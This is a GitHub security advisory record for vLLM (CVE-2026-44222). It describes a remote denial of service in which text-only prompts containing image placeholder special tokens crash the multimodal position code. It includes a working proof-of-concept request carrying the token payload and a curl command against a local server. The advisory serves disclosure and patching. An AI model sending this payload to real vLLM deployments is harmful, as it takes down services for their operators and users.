{"uuid":"GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","url":"https://github.com/advisories/GHSA-hpv8-x276-m59f","title":"vLLM Vulnerable to Remote DoS via Special-Token Placeholders","description":"## Summary\nThis report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n  - vllm/model_executor/layers/rotary_embedding.py\n    - get_input_positions_tensor(...)\n    - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n    cls,\n    input_tokens,\n    hf_config,\n    image_grid_thw,\n    video_grid_thw,\n    ...,\n):\n    # detect video tokens\n    video_nums = (vision_tokens == video_token_id).sum()\n    # later in processing\n    t, h, w = (\n        video_grid_thw[video_index][0],  # IndexError if no video data\n        video_grid_thw[video_index][1],\n        video_grid_thw[video_index][2],\n    )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n → vllm.v1.engine.core: step/execute_model\n → vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n → _vl_get_input_positions_tensor\n → IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n  --model Qwen/Qwen2.5-VL-3B-Instruct \\\n  --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c'JSON'\n{\n  \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        { \"type\": \"text\",\n          \"text\": \"what's in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n      ]\n    }\n  ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n  -H 'Content-Type: application/json' \\\n  --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group)  \nZiteng Xu (Infra Security, Ant Group)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-05T22:21:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f","https://github.com/vllm-project/vllm/issues/32656","https://nvd.nist.gov/vuln/detail/CVE-2026-44222","https://github.com/advisories/GHSA-hpv8-x276-m59f"],"source_kind":"github","identifiers":["GHSA-hpv8-x276-m59f","CVE-2026-44222"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T23:00:08.441Z","updated_at":"2026-05-16T01:00:33.946Z","epss_percentage":0.00039,"epss_percentile":0.11742,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.20.0","vulnerable_version_range":"\u003e= 0.6.1, \u003c 0.20.0"}],"purl":"pkg:pypi/vllm","statistics":{"dependent_packages_count":46,"dependent_repos_count":5,"downloads":7408760,"downloads_period":"last-month"},"affected_versions":["0.6.1","0.6.2","0.6.3","0.6.3.post1","0.6.4","0.6.4.post1","0.6.5","0.6.6","0.6.6.post1","0.7.0","0.7.1","0.7.2","0.7.3","0.8.0","0.8.1","0.8.2","0.8.3","0.8.4","0.8.5","0.8.5.post1","0.9.0","0.9.0.1","0.9.1","0.9.2","0.10.0","0.10.1","0.10.1.1","0.10.2","0.11.0","0.11.1","0.11.2","0.12.0","0.13.0","0.14.0","0.14.1","0.15.0","0.15.1","0.16.0","0.17.0","0.17.1","0.18.0","0.18.1","0.19.0","0.19.1"],"unaffected_versions":["0.0.1","0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.2.0","0.2.1","0.2.1.post1","0.2.2","0.2.3","0.2.4","0.2.5","0.2.6","0.2.7","0.3.0","0.3.1","0.3.2","0.3.3","0.4.0","0.4.0.post1","0.4.1","0.4.2","0.4.3","0.5.0","0.5.0.post1","0.5.1","0.5.2","0.5.3","0.5.3.post1","0.5.4","0.5.5","0.6.0","0.6.1.post1","0.6.1.post2","0.20.0","0.20.1","0.20.2"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocHY4LXgyNzYtbTU5Zs4ABWN_/related_packages","related_advisories":[]}